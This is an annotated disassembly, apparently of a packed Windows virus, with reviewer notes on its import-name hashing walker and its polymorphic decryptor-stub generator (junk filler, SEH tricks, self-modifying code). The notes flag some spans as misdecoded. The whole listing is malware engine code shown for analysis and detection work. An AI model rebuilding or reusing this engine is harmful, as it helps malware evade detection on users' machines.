        pop    esi                             ; esi saved by sub_3143250B
        cmp    dword ptr [edx], 0
        jz     short loc_314324A5
        push   dword ptr [edx]
        jmp    short loc_314324A8
; ---------------------------------------------------------------------------

loc_314324A5:                                  ; CODE XREF: sub_314324BA-1Bj
        push   dword ptr [edx+10h]

loc_314324A8:                                  ; CODE XREF: sub_314324BA-17j
        call   sub_31432404                    ; refresh the delta in [ebp+1042E8h]
        sub    ecx, esi
        sub    ecx, [ebp+1042E8h]
        pop    eax                             ; drops one more stacked return address
        add    ecx, [ebx+34h]
        retn
; END OF FUNCTION CHUNK FOR sub_314324BA

; =============== S U B R O U T I N E =======================================

; sub_314324BA -- two passes over the import walker with two different callbacks.
;
; The first instruction pops the caller's return address into [ebp+1042C4h];
; sub_3143250B calls through that slot, so the caller's following instructions
; act as the pass-1 callback. Pass 1 leaves a count in [ebp+1042C0h]. The
; count is handed in eax to a helper at dword_31431B40+43h (not visible in
; this part of the listing; presumably returns a bounded pick in edx -- TODO
; confirm). sub_314324F7 then installs the instructions after its own call
; site (the cmp/jnz below) as the pass-2 callback and stores edx as the
; countdown. When the countdown reaches 0 the current hash in ebx is saved to
; [ebp+102400h] and control leaves through the chunk at loc_3143248C.
; Because return addresses are popped rather than returned to, the stack does
; not balance in the usual way (hence "sp-analysis failed").
sub_314324BA proc near                         ; CODE XREF: UPX2:31432451p

; FUNCTION CHUNK AT 3143248C SIZE 0000002E BYTES

        pop    dword ptr [ebp+1042C4h]         ; return address becomes the callback
        mov    dword ptr [ebp+1042C0h], 0
        call   sub_3143250B                    ; pass 1
        mov    eax, [ebp+1042C0h]
        call   near ptr dword_31431B40+43h
        call   sub_314324F7                    ; pass 2; does not return here normally
        cmp    dword ptr [ebp+1042C0h], 0      ; <- pass-2 callback entry
        jnz    short loc_314324F0
        mov    [ebp+102400h], ebx
        jmp    short loc_3143248C
; ---------------------------------------------------------------------------

loc_314324F0:                                  ; CODE XREF: sub_314324BA+2Cj
        dec    dword ptr [ebp+1042C0h]
        retn
sub_314324BA endp ; sp-analysis failed

; =============== S U B R O U T I N E =======================================

; sub_314324F7 -- install the caller's continuation as the callback, set the
; countdown in [ebp+1042C0h] from edx, and run the import walker.
; If the walk finishes without the callback diverting control, ecx is zeroed
; and retn consumes whatever address is next on the stack (this routine's own
; return address was already popped).
sub_314324F7 proc near                         ; CODE XREF: sub_314324BA+20p
        pop    dword ptr [ebp+1042C4h]
        mov    [ebp+1042C0h], edx
        call   sub_3143250B
        xor    ecx, ecx
        retn
sub_314324F7 endp ; sp-analysis failed

; =============== S U B R O U T I N E =======================================

; sub_3143250B -- walk a table of 14h-byte descriptors and invoke the callback
; in [ebp+1042C4h] for selected imported names.
;
; In:   ebx  header base as in sub_31432404; [ebx+80h] is used as the table's
;            RVA (the import directory under the PE reading).
;       esi  base the file-relative offsets are added to (presumably the
;            start of the mapped file; confirm at callers).
; Per descriptor (stops at the first one with [edx+0Ch] or [edx+10h] == 0):
;   - the name at [edx+0Ch] is scanned up to a case-insensitive ".DLL" or
;     the terminating NUL;
;   - only names at least 6 characters long before that point, whose last two
;     characters are "32", are processed further;
;   - the dword array named by [edx] (or [edx+10h] when [edx] is 0) is read;
;     entries with the top bit set are skipped, a zero entry ends the array;
;   - for each remaining entry the string at entry+2 is hashed as
;     h = 15*h - (c | 20h) and, unless h equals one of eight fixed values,
;     the callback is called with ebx = h.
; Clobbers eax, ecx, edx; ebx and esi are saved around the inner loop.
sub_3143250B proc near                         ; CODE XREF: sub_314324BA+10p
                                               ; sub_314324F7+Cp ...

var_C = dword ptr -0Ch
var_4 = dword ptr -4

        mov    edx, [ebx+80h]
        push   edx
        call   sub_31432404
        add    edx, [ebp+1042E8h]              ; RVA -> offset within the file
        add    edx, esi                        ; -> pointer into the mapping

loc_3143251F:                                  ; CODE XREF: sub_3143250B+120j
        cmp    dword ptr [edx+0Ch], 0
        jz     locret_31432630
        cmp    dword ptr [edx+10h], 0
        jz     locret_31432630
        mov    eax, [edx+0Ch]
        push   eax
        call   sub_31432404
        add    eax, [ebp+1042E8h]
        add    eax, esi                        ; eax = name string
        push   eax                             ; remember where the name starts

loc_31432545:                                  ; CODE XREF: sub_3143250B+47j
        mov    cl, [eax]
        cmp    cl, 0
        jz     short loc_31432565
        cmp    cl, 2Eh                         ; '.'
        jz     short loc_31432554

loc_31432551:                                  ; CODE XREF: sub_3143250B+58j
        inc    eax
        jmp    short loc_31432545
; ---------------------------------------------------------------------------

loc_31432554:                                  ; CODE XREF: sub_3143250B+44j
        mov    ecx, [eax+1]
        and    ecx, 0DFDFDFDFh                 ; fold ASCII letters to upper case
        cmp    ecx, 4C4C44h                    ; "DLL" followed by NUL
        jnz    short loc_31432551

loc_31432565:                                  ; CODE XREF: sub_3143250B+3Fj
        pop    ecx
        sub    ecx, eax                        ; ecx = -(characters scanned)
        cmp    ecx, 0FFFFFFFAh                 ; -6
        jg     loc_31432628                    ; fewer than 6 characters: next descriptor
        cmp    word ptr [eax-2], 3233h         ; bytes '3','2' just before the stop point
        jnz    loc_31432628
        push   esi
        cmp    dword ptr [edx], 0
        jnz    short loc_31432588
        mov    ecx, [edx+10h]
        jmp    short loc_3143258A
; ---------------------------------------------------------------------------

loc_31432588:                                  ; CODE XREF: sub_3143250B+76j
        mov    ecx, [edx]

loc_3143258A:                                  ; CODE XREF: sub_3143250B+7Bj
        add    esi, ecx
        push   ecx
        call   sub_31432404
        add    esi, [ebp+1042E8h]              ; esi = cursor over the dword array

loc_31432598:                                  ; CODE XREF: sub_3143250B+90j
                                               ; sub_3143250B+117j
        lodsd
        test   eax, eax
        js     short loc_31432598              ; top bit set: skip this entry
        jz     loc_31432627                    ; zero entry: end of array
        push   dword ptr [ebp+1042E8h]         ; keep the array's delta across the lookup
        push   eax
        call   sub_31432404
        add    eax, [ebp+1042E8h]
        pop    dword ptr [ebp+1042E8h]
        add    eax, [esp+4+var_4]              ; + esi saved by `push esi` above
        push   ebx
        add    eax, 2                          ; string starts 2 bytes into the entry
        xor    ebx, ebx                        ; h = 0

loc_314325C4:                                  ; CODE XREF: sub_3143250B+CEj
        movzx  ecx, byte ptr [eax]
        jecxz  short loc_314325DB
        or     cl, 20h                         ; fold ASCII letters to lower case
        push   ebx
        shl    [esp+0Ch+var_C], 4              ; top of stack = 16*h
        sub    [esp+0Ch+var_C], ebx            ;              - h
        sub    [esp+0Ch+var_C], ecx            ;              - c
        pop    ebx                             ; h = 15*h - c
        inc    eax
        jmp    short loc_314325C4
; ---------------------------------------------------------------------------

; Eight hash values for which the callback is not invoked. The names behind
; them cannot be read from this listing.
loc_314325DB:                                  ; CODE XREF: sub_3143250B+BCj
        cmp    ebx, 0DDBBD70Fh
        jz     short loc_31432621
        cmp    ebx, 0DB6E45A8h
        jz     short loc_31432621
        cmp    ebx, 0FFA13B59h
        jz     short loc_31432621
        cmp    ebx, 0ACB522D6h
        jz     short loc_31432621
        cmp    ebx, 0F358E993h
        jz     short loc_31432621
        cmp    ebx, 0F358E97Dh
        jz     short loc_31432621
        cmp    ebx, 0E1253F46h
        jz     short loc_31432621
        cmp    ebx, 0E1253F30h
        jz     short loc_31432621
        call   dword ptr [ebp+1042C4h]         ; callback installed by the caller

loc_31432621:                                  ; CODE XREF: sub_3143250B+D6j
                                               ; sub_3143250B+DEj ...
        pop    ebx
        jmp    loc_31432598
; ---------------------------------------------------------------------------

loc_31432627:                                  ; CODE XREF: sub_3143250B+92j
        pop    esi

loc_31432628:                                  ; CODE XREF: sub_3143250B+60j
                                               ; sub_3143250B+6Cj
        add    edx, 14h                        ; next descriptor
        jmp    loc_3143251F
; ---------------------------------------------------------------------------

locret_31432630:                               ; CODE XREF: sub_3143250B+18j
                                               ; sub_3143250B+22j
        retn
sub_3143250B endp

; ---------------------------------------------------------------------------
; Bytes the disassembler left undecoded. Other code in this listing calls
; `dword_31432634+68h`, i.e. into this run, so at least part of it is code.
; NOTE(review): if the first dd below is dword_31432634, the bytes at +68h are
; 8D 95 BC 39 10 00 / 2B D7 / F7 DA / C3, which hand-decode to
; lea edx,[ebp+1039BCh]; sub edx,edi; neg edx; retn (edx = edi minus the
; buffer start). Confirm by re-disassembling from that offset.
        align 2
        dw 46Ah
        dd 0F549E858h, 9588FFFFh, 102631h, 1831B866h, 0E4C0E202h
        dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
        dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 31850250h, 0AA001026h
        dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
        dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
        dd 0C3BFE2ABh, 39BC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039B085h
        dd 0
; ---------------------------------------------------------------------------
; NOTE(review): the first instructions below look misaligned. The dd run ends
; with F7 85 B0 39 10 00 00 00 00, the start of a
; `test dword ptr [ebp+1039B0h], imm32`, so the bytes shown as adc/xchg/rol/or
; are most likely the tail of that immediate plus the instructions that follow
; it. Treat this fragment as unreliable until re-disassembled; the part from
; loc_314326C6 on is consistent with its cross-references.
        adc    [edi], cl
        xchg   eax, ebp
        rol    cl, 0E0h
        or     esi, esi
        test   [esi+1001039h], ebp
        jnz    short loc_314326C6
        or     ax, 2589h
        jmp    short loc_314326D9
; ---------------------------------------------------------------------------

loc_314326C6:                                  ; CODE XREF: UPX2:314326BEj
        test   byte ptr [ebp+1039AEh], 2
        jnz    short loc_314326D5
        or     ax, 2531h
        jmp    short loc_314326D9
; ---------------------------------------------------------------------------

loc_314326D5:                                  ; CODE XREF: UPX2:314326CDj
        or     ax, 2501h

loc_314326D9:                                  ; CODE XREF: UPX2:314326C4j
                                               ; UPX2:314326D3j
        stosw                                  ; two bytes chosen above go to [edi]
        call   near ptr dword_31432634+68h
        mov    eax, [ebx+34h]
        mov    [ebp+1042D8h], edx              ; remember the helper's result
        stosd                                  ; followed by the dword at [ebx+34h]
        retn

; =============== S U B R O U T I N E =======================================

; sub_314326EB -- append 5 bytes at edi: one opcode byte and one dword.
;
; The byte is 0BCh, or 0BDh when bit 10000000h of [ebp+1039B0h] is set (in
; x86 these encode mov esp,imm32 / mov ebp,imm32). The dword is the low half
; of rdtsc, or 0 when bit 0 of [ebp+1039AEh] is set. The helper's edx result
; is saved to [ebp+1042DCh] between the two stores.
; In/Out: edi = write cursor (advanced by 5). Clobbers eax, edx.
sub_314326EB proc near                         ; CODE XREF: UPX2:31432D37p
        test   dword ptr [ebp+1039B0h], 10000000h
        setnz  al
        add    al, 0BCh
        stosb
        call   near ptr dword_31432634+68h
        mov    [ebp+1042DCh], edx
        test   byte ptr [ebp+1039AEh], 1
        jnz    short loc_31432713
        rdtsc
        jmp    short loc_31432715
; ---------------------------------------------------------------------------

loc_31432713:                                  ; CODE XREF: sub_314326EB+22j
        sub    eax, eax

loc_31432715:                                  ; CODE XREF: sub_314326EB+26j
        stosd
        retn
sub_314326EB endp

; =============== S U B R O U T I N E =======================================

; sub_31432717 -- append one of two fixed byte patterns at edi, parameterised
; by the byte at [ebp+1039AAh] (presumably a register number 0..7; confirm
; where that byte is written).
;
; Bit 10000000h of [ebp+1039B0h] set:  8B (45h | r<<3) F8, then
;                                      67 64 89 (06h | r<<3) 00 00   (9 bytes)
; Bit clear:                           64 8F 05 00 00 00 00 (58h + r) (8 bytes)
; Hand-decoded, the first reads a register from [ebp-8] and stores it to
; fs:[0]; the second pops into fs:[0] and then pops a register. Both touch the
; fs:[0] slot (the SEH chain head on 32-bit Windows), which is a useful
; pattern when writing detections for the generated stub -- confirm the
; decoding against an opcode map.
; In/Out: edi = write cursor. Clobbers eax.
sub_31432717 proc near                         ; CODE XREF: UPX2:loc_31432D41p
        test   dword ptr [ebp+1039B0h], 10000000h
        jz     short loc_3143274A
        mov    al, [ebp+1039AAh]
        shl    eax, 0Bh                        ; r lands in bits 3..5 of ah
        or     ax, 458Bh
        stosw
        mov    al, 0F8h
        stosb
        mov    al, [ebp+1039AAh]
        shl    eax, 1Bh                        ; r lands in bits 3..5 of the top byte
        add    eax, 6896467h
        stosd
        xor    eax, eax
        stosw
        jmp    short locret_3143275C
; ---------------------------------------------------------------------------

loc_3143274A:                                  ; CODE XREF: sub_31432717+Aj
        mov    eax, 58F64h
        stosd
        mov    al, [ebp+1039AAh]
        add    al, 58h
        shl    eax, 18h                        ; three zero bytes, then 58h + r
        stosd

locret_3143275C:                               ; CODE XREF: sub_31432717+31j
        retn
sub_31432717 endp

; =============== S U B R O U T I N E =======================================

; sub_3143275D -- append a variable-length run of filler bytes at edi.
;
; Each round calls the helper at dword_31431B40+43h (not visible here) with a
; limit in eax and dispatches on dl:
;   0 -> FC        1 -> EB 00      2 -> 89 (C0h + 9*n), n from a second helper
;   3 -> 90        4 -> 87 DB      5 -> F5       6 -> F8       7 -> F9
;   8 or more -> return
; Hand-decoded these are cld, jmp $+2, mov reg,reg (same register), nop,
; xchg ebx,ebx, cmc, clc, stc: instructions with no effect on data registers.
; The byte at [ebp+10278Ch] is set to 9 on entry and raised by 6 each round.
; NOTE(review): offset 10278Ch lines up with the immediate operand of the
; `push 1Bh` at loc_3143278B if ebp holds the same base as the other
; ebp-relative references, i.e. the routine appears to patch its own limit
; (self-modifying code) -- confirm in a debugger or emulator.
; In/Out: edi = write cursor. Clobbers eax, edx.
sub_3143275D proc near                         ; CODE XREF: sub_314327CF:loc_314327F6p
                                               ; sub_314327CF+4Cp ...
        mov    byte ptr [ebp+10278Ch], 9
        jmp    short loc_3143278B
; ---------------------------------------------------------------------------

loc_31432766:                                  ; CODE XREF: sub_3143275D+44j
        mov    al, 0FCh
        jmp    short loc_3143278A
; ---------------------------------------------------------------------------

loc_3143276A:                                  ; CODE XREF: sub_3143275D+48j
        mov    ax, 0EBh
        stosw
        jmp    short loc_3143278B
; ---------------------------------------------------------------------------

loc_31432772:                                  ; CODE XREF: sub_3143275D+4Cj
        push   4
        pop    eax
        call   near ptr dword_31431B40+43h
        lea    eax, [edx+edx*8]                ; 9*n: same value in both 3-bit fields
        shl    eax, 8
        add    ax, 0C089h
        stosw
        jmp    short loc_3143278B
; ---------------------------------------------------------------------------

loc_31432788:                                  ; CODE XREF: sub_3143275D+50j
        mov    al, 90h

loc_3143278A:                                  ; CODE XREF: sub_3143275D+Bj
                                               ; sub_3143275D+60j ...
        stosb

loc_3143278B:                                  ; CODE XREF: sub_3143275D+7j
                                               ; sub_3143275D+13j ...
        push   1Bh                             ; limit passed to the helper (see header note)
        pop    eax
        call   near ptr dword_31431B40+43h
        add    byte ptr [ebp+10278Ch], 6
        cmp    dl, 8
        jnb    short locret_314327CE           ; 8 or more ends the run
        test   dl, dl
        jz     short loc_31432766
        dec    dl
        jz     short loc_3143276A
        dec    dl
        jz     short loc_31432772
        dec    dl
        jz     short loc_31432788
        dec    dl
        jz     short loc_314327BF
        dec    dl
        jz     short loc_314327C6
        dec    dl
        jz     short loc_314327CA
        mov    al, 0F9h
        jmp    short loc_3143278A
; ---------------------------------------------------------------------------

loc_314327BF:                                  ; CODE XREF: sub_3143275D+54j
        mov    al, 87h
        stosb
        mov    al, 0DBh
        jmp    short loc_3143278A
; ---------------------------------------------------------------------------

loc_314327C6:                                  ; CODE XREF: sub_3143275D+58j
        mov    al, 0F5h
        jmp    short loc_3143278A
; ---------------------------------------------------------------------------

loc_314327CA:                                  ; CODE XREF: sub_3143275D+5Cj
        mov    al, 0F8h
        jmp    short loc_3143278A
; ---------------------------------------------------------------------------

locret_314327CE:                               ; CODE XREF: sub_3143275D+40j
        retn
sub_3143275D endp

; =============== S U B R O U T I N E =======================================

; sub_314327CF -- append a three-part byte sequence at edi, with filler from
; sub_3143275D between the parts.
;
;   part 1: 86h or 8Ah (bit 2000h of [ebp+1039B0h] clear -> 8Ah), then the
;           byte at [ebp+1039A8h]
;   part 2: 66 31 or 66 29 (bit 4000h clear -> 29h), then
;           (18h | [ebp+1039AAh]) << 3
;   part 3: 88h or 86h (bit 8000h clear -> 86h), then the byte at
;           [ebp+1039A8h]
; In parts 1 and 3, when that second byte equals 5 it is OR-ed with 40h and a
; zero byte is appended (in x86 ModRM terms: [ebp] needs the disp8 form).
; Hand-decoded this is a byte load/exchange through a pointer register, a
; 16-bit xor or sub against another register, and a byte store/exchange back
; -- presumably the per-byte transform of the generated stub; confirm.
; In/Out: edi = write cursor. ecx is set to edi-2 on entry. Clobbers eax, edx.
sub_314327CF proc near                         ; CODE XREF: UPX2:loc_31432C18p
                                               ; UPX2:31432DCBp
        test   dword ptr [ebp+1039B0h], 2000h
        mov    al, 86h
        jnz    short loc_314327DF
        add    al, 4

loc_314327DF:                                  ; CODE XREF: sub_314327CF+Cj
        lea    ecx, [edi-2]
        mov    ah, [ebp+1039A8h]
        stosw
        cmp    ah, 5
        jnz    short loc_314327F6
        mov    al, 0
        or     byte ptr [edi-1], 40h           ; patch the byte just written
        stosb

loc_314327F6:                                  ; CODE XREF: sub_314327CF+1Ej
        call   sub_3143275D
        test   dword ptr [ebp+1039B0h], 4000h
        mov    ax, 3166h
        jnz    short loc_3143280D
        mov    ah, 29h

loc_3143280D:                                  ; CODE XREF: sub_314327CF+3Aj
        stosw
        mov    al, 18h
        or     al, [ebp+1039AAh]
        shl    al, 3
        stosb
        call   sub_3143275D
        mov    al, 88h
        test   dword ptr [ebp+1039B0h], 8000h
        jnz    short loc_31432830
        mov    al, 86h

loc_31432830:                                  ; CODE XREF: sub_314327CF+5Dj
        mov    ah, [ebp+1039A8h]
        stosw
        cmp    ah, 5
        jnz    short locret_31432844
        mov    al, 0
        or     byte ptr [edi-1], 40h
        stosb

locret_31432844:                               ; CODE XREF: sub_314327CF+6Cj
        retn
sub_314327CF endp
; ---------------------------------------------------------------------------
; loc_31432845 .. 31432EDE (retn 4) -- straight-line routine that fills the
; buffer at [ebp+1039BCh] through edi.
;
; What the visible instructions establish:
;   - edi starts at [ebp+1039BCh]; every stosb/stosw/stosd appends there.
;   - Which bytes are appended is chosen by testing single bits of the dword
;     at [ebp+1039B0h]; the bytes at [ebp+1039A8h], [ebp+1039A9h] and
;     [ebp+1039AAh] are OR-ed/added into opcode bytes (presumably three
;     register numbers 0..7); [ebp+1039AEh] and [ebp+1039AFh] supply
;     immediate bytes.
;   - sub_3143275D (filler bytes) is called between most pieces.
;   - Positions are remembered in [ebp+1042BCh], [ebp+1042D4h], [ebp+1042E0h]
;     and used later to back-patch relative offsets.
; Read together with sub_314326EB/sub_31432717/sub_314327CF this appears to be
; the generator for a variable (polymorphic) decoding stub. The opcode names
; in the comments below are hand-decoded from the stored constants; confirm
; them against an opcode map before relying on them for signatures.
; A large middle part of the routine was not decoded by the disassembler and
; appears as db/dd data.

loc_31432845:                                  ; CODE XREF: sub_3143344B+183p
        lea    edi, [ebp+1039BCh]              ; start of the output buffer
        call   sub_3143275D
        test   dword ptr [ebp+1039B0h], 400000h
        jz     short near ptr unk_3143285F
        mov    al, 60h                         ; 60h = pusha
        stosb
; ---------------------------------------------------------------------------
; NOTE(review): unk_3143285F is the target of the jz above, so an instruction
; most likely starts here. The bytes F7 85 B0 39 10 00 match the encoding of
; the `test dword ptr [ebp+1039B0h], imm32` used throughout this routine,
; which suggests that the db run, the four "instructions" after it (decoded
; from the middle of that test) and the dd run are all code. Re-disassemble
; from unk_3143285F before drawing conclusions from this span.
unk_3143285F db 0F7h                           ; CODE XREF: UPX2:3143285Aj
        db 85h
        db 0B0h
        db 39h ; 9
        db 10h
        db 0
        db 0
        db 0
        db 0
; ---------------------------------------------------------------------------
        adc    [edi+eax-48h], dh
        push   ebp
        mov    ebp, esp
        add    [ebx-4F7A08B1h], ch
        cmp    [eax], edx
        add    [ebx], al
; ---------------------------------------------------------------------------
        db 2 dup(0), 2
        dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042C8h, 0FFFECCE8h
        dd 0AAE8B0FFh, 0CCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39B085F7h
        dd 30010h, 1A740000h, 39B085F7h, 10h, 0A740200h, 0FFFE2EE8h
        dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042C8h, 0C82BCF8Bh
        dd 42D0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
        dd 1039B085h, 300h, 0F6137400h, 1039AE85h, 0A748000h, 0FFFDAAE8h
        dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39B085F7h
        dd 30010h, 5A740000h, 39AE85F6h, 75800010h, 0FD81E80Ah
        dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
        dd 0FFB86639h, 91AB6615h, 0B0958BABh, 0F7001039h, 3C2F7D2h
        dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
        dd 91AB6615h, 8BCF8BABh, 1042D085h, 89C82B00h, 85F7FC48h
        dd 1039B0h, 3, 85F73874h, 1039B0h, 0C000000h, 85F72C74h
        dd 1039B0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
        dd 39B085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
        dd 1039B0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
        dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039B0h
        dd 8, 0BD807275h, 1039AEh, 0E8697400h, 0FFFFFD65h, 291829B8h
        dd 0AAA50AC9h, 0C0001039h, 0A50A03E4h, 1039AAh, 0FD4BE8ABh
        dd 0B1B0FFFFh, 0AE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
        dd 1039AAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
        dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0B085F759h, 10001039h
        dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
        dd 0AAE8B0FFh, 89ABC033h, 1042B4BDh, 0B085F700h, 20001039h
        dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039B085h, 0
        dd 89187480h, 1042E0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
        dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039A8h
        dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0B085F7C0h, 40001039h
        dd 74000000h, 28C48003h, 39A8A50Ah, 0AB660010h, 42B8BD89h
        dd 0F7AB0010h, 1039B085h, 0
; ---------------------------------------------------------------------------
; NOTE(review): `inc eax` (byte 40h) is most likely the last byte of the
; immediate of a `test dword ptr [ebp+1039B0h], 40000000h` that begins in the
; dd run above (... F7 85 B0 39 10 00 00 00 00), not an instruction of its
; own. From the jnz onward the listing is consistent with its cross-references.
        inc    eax
        jnz    short loc_31432AF0
        mov    al, 50h                         ; 50h + r = push reg
        add    al, [ebp+1039A8h]
        stosb

loc_31432AF0:                                  ; CODE XREF: UPX2:31432AE5j
        test   dword ptr [ebp+1039B0h], 80h
        jnz    short loc_31432B07
        mov    al, 0B8h                        ; B8h | r = mov reg, imm32
        or     al, [ebp+1039A9h]
        stosb
        jmp    short loc_31432B44
; ---------------------------------------------------------------------------

loc_31432B07:                                  ; CODE XREF: UPX2:31432AFAj
        mov    ax, 1831h                       ; 31h (xor) or 29h (sub) ...
        test   dword ptr [ebp+1039B0h], 100h
        jz     short loc_31432B19
        mov    al, 29h

loc_31432B19:                                  ; CODE XREF: UPX2:31432B15j
        or     ah, [ebp+1039A9h]               ; ... with the same register number in
        shl    ah, 3                           ; both 3-bit fields of the second byte
        or     ah, [ebp+1039A9h]               ; (reg, reg: clears the register)
        stosw
        mov    ax, 0F081h                      ; 81 F0|r (xor reg, imm32) ...
        test   dword ptr [ebp+1039B0h], 200h
        jnz    short loc_31432B3C
        mov    ah, 0C8h                        ; ... or 81 C8|r (or reg, imm32)

loc_31432B3C:                                  ; CODE XREF: UPX2:31432B38j
        or     ah, [ebp+1039A9h]
        stosw

loc_31432B44:                                  ; CODE XREF: UPX2:31432B05j
        mov    [ebp+1042D4h], edi              ; where the imm32 is stored;
        mov    eax, 29BCh                      ; loc_31432EA4 adds to it later
        stosd
        test   dword ptr [ebp+1039B0h], 8
        jz     short loc_31432BCD
        call   sub_3143275D
        test   dword ptr [ebp+1039B0h], 400h
        jnz    short loc_31432B78
        mov    al, 0B8h                        ; B8h | r = mov reg, imm32
        or     al, [ebp+1039AAh]
        stosb
        jmp    short loc_31432BC5
; ---------------------------------------------------------------------------

loc_31432B78:                                  ; CODE XREF: UPX2:31432B6Bj
        test   dword ptr [ebp+1039B0h], 800h
        jnz    short loc_31432B95
        mov    ax, 0E083h                      ; 83 E0|r 00 = and reg, 0
        or     ah, [ebp+1039AAh]
        stosw
        xor    eax, eax
        stosb
        jmp    short loc_31432BAA
; ---------------------------------------------------------------------------

loc_31432B95:                                  ; CODE XREF: UPX2:31432B82j
        mov    ax, 1829h                       ; 29h with reg, reg = sub reg, reg
        or     ah, [ebp+1039AAh]
        shl    ah, 3
        or     ah, [ebp+1039AAh]
        stosw

loc_31432BAA:                                  ; CODE XREF: UPX2:31432B93j
        test   dword ptr [ebp+1039B0h], 1000h
        mov    ax, 0C081h                      ; 81 C0|r (add reg, imm32) ...
        jz     short loc_31432BBD
        add    ah, 8                           ; ... or 81 C8|r (or reg, imm32)

loc_31432BBD:                                  ; CODE XREF: UPX2:31432BB8j
        or     ah, [ebp+1039AAh]
        stosw

loc_31432BC5:                                  ; CODE XREF: UPX2:31432B76j
        movzx  eax, byte ptr [ebp+1039AEh]     ; imm32 = the byte at [ebp+1039AEh]
        stosd

loc_31432BCD:                                  ; CODE XREF: UPX2:31432B5Aj
        call   sub_3143275D
        test   dword ptr [ebp+1039B0h], 40000000h
        jz     short loc_31432BEC
        mov    al, 50h                         ; 50h + r = push reg
        add    al, [ebp+1039A8h]
        stosb
        call   sub_3143275D

loc_31432BEC:                                  ; CODE XREF: UPX2:31432BDCj
        lea    ecx, [edi-2]
        mov    [ebp+1042BCh], ecx              ; edi-2 here; turned into the backward
                                               ; branch displacement further down
        test   dword ptr [ebp+1039B0h], 80000000h
        jz     short loc_31432C18
        mov    al, 0E8h                        ; E8 rel32 = call
        stosb
        mov    eax, [ebp+1042E0h]
        sub    eax, edi
        sub    eax, 4
        stosd
        mov    [ebp+1042E0h], edi              ; position just past the rel32
        jmp    short loc_31432C1D
; ---------------------------------------------------------------------------

loc_31432C18:                                  ; CODE XREF: UPX2:31432BFFj
        call   sub_314327CF                    ; inline load / xor-or-sub / store bytes

loc_31432C1D:                                  ; CODE XREF: UPX2:31432C16j
        call   sub_3143275D
        test   dword ptr [ebp+1039B0h], 10000h
        jnz    short loc_31432C39
        mov    al, 40h                         ; 40h | r = inc reg
        or     al, [ebp+1039A8h]
        stosb
        jmp    short loc_31432C48
; ---------------------------------------------------------------------------

loc_31432C39:                                  ; CODE XREF: UPX2:31432C2Cj
        mov    ax, 0C083h                      ; 83 C0|r 01 = add reg, 1
        or     ah, [ebp+1039A8h]
        stosw
        mov    al, 1
        stosb

loc_31432C48:                                  ; CODE XREF: UPX2:31432C37j
        test   dword ptr [ebp+1039B0h], 20000h
        jnz    short loc_31432C83
        test   dword ptr [ebp+1039B0h], 40000h
        jnz    short loc_31432C7A
        mov    al, 0C0h                        ; 66 81 C0|r ib 00 = add reg16, imm16
        or     al, [ebp+1039AAh]               ; with the low immediate byte taken
        mov    ah, [ebp+1039AFh]               ; from [ebp+1039AFh]
        shl    eax, 10h
        mov    ax, 8166h
        stosd
        mov    al, 0
        jmp    short loc_31432C82
; ---------------------------------------------------------------------------

loc_31432C7A:                                  ; CODE XREF: UPX2:31432C5Ej
        mov    al, 40h                         ; 40h | r = inc reg
        or     al, [ebp+1039AAh]

loc_31432C82:                                  ; CODE XREF: UPX2:31432C78j
        stosb

loc_31432C83:                                  ; CODE XREF: UPX2:31432C52j
        test   dword ptr [ebp+1039B0h], 80000h
        jnz    short loc_31432C9F
        mov    ax, 0E883h                      ; 83 E8|r 01 = sub reg, 1
        or     ah, [ebp+1039A9h]
        stosw
        mov    al, 1
        jmp    short loc_31432CA7
; ---------------------------------------------------------------------------

loc_31432C9F:                                  ; CODE XREF: UPX2:31432C8Dj
        mov    al, 48h                         ; 48h | r = dec reg
        or     al, [ebp+1039A9h]

loc_31432CA7:                                  ; CODE XREF: UPX2:31432C9Dj
        stosb
        call   sub_3143275D
        test   dword ptr [ebp+1039B0h], 100000h
        mov    cl, 75h                         ; 75h = jnz rel8
        jnz    short loc_31432CE0
        mov    ax, 0F883h                      ; 83 F8|r 00 = cmp reg, 0
        or     ah, [ebp+1039A9h]
        stosw
        xor    eax, eax
        stosb
        sub    [ebp+1042BCh], edi              ; saved position minus current edi
        test   dword ptr [ebp+1039B0h], 200000h
        jnz    short loc_31432CFB
        mov    cl, 77h                         ; 77h = ja rel8
        jmp    short loc_31432CFB
; ---------------------------------------------------------------------------

loc_31432CE0:                                  ; CODE XREF: UPX2:31432CB9j
        mov    ax, 1809h                       ; 09h with reg, reg = or reg, reg
        or     ah, [ebp+1039A9h]
        shl    ah, 3
        or     ah, [ebp+1039A9h]
        stosw
        sub    [ebp+1042BCh], edi

loc_31432CFB:                                  ; CODE XREF: UPX2:31432CDAj
                                               ; UPX2:31432CDEj
        mov    al, cl
        mov    ah, [ebp+1042BCh]               ; low byte of the difference = rel8
        stosw                                  ; conditional jump back (loop end)
        mov    al, 58h                         ; 58h + r = pop reg
        add    al, [ebp+1039A8h]
        stosb
        call   sub_3143275D
